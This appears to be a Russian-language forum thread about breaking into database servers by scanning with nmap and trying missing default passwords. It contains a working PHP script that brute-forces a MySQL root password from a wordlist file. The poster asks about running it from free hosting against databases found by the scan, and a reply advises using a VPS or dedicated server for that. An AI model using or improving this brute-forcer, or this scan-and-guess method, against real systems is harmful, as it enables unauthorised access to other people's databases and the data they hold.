пару вопросов по статейке - Взлом СУБД

тут вчера наткнулся на статейку http://www.inattack.ru/article/469.html

суть которой сводится к тому что можно просканить сеть каким нибудь сканером (например nmap-ом) и попробывать приконнектится к СУБД с расчетом, что когда ее устанавливали забыли по дефолту пароль поставить

1. это актуально? т.е. такое еще работает, статейка та не первой свежести

2. т.к. недавно начал изучать пых по прочтению решил набросать простой скриптик-брутер. У меня на локалхосте нормально пас подбирает к mysql. Вопрос можно ли будет его залить на фрихост с поддержкой пхп и оттуда брутить найденные сканером СУБД?

Code:

<?php
$host="localhost";
$name="root";
 
set_time_limit(0);
$f=fopen("words.dic","rt") or die("Нет файла с паролями!");

if (@mysql_connect($host,$name,"")){
   echo "Пароля нет!";
   fclose ($f);
   @mysql_close();
   exit;
}//if

while (true){
    $str=trim(fgets ($f));
	if ($str=="") break;

	if (@mysql_connect($host,$name,$str)){
	    echo "Пароль: ".$str;
		fclose ($f);
		@mysql_close();
		exit;
	}//if
}//wh
  
echo "Пароль не найден!";
fclose ($f);
?>

 

Питон. щас все хостеры на серверах закрывают внешние порты Уже не актуально это делать

 

ммм... нубский вопросик под словом "Питон.", что имел ввиду - язык или брандмауэр какой?

 

фрихосты только если, ну или хосты за пять рублей.


Demon1X, можно конечно, но фрихост не пойдет, лучше с vps или выделенного сервера.

 

Уверен на 100% что если где-то и будет база без пароля, то только на каком нибудь зачуханном дёдике.
На крайняк коннект только с localhost.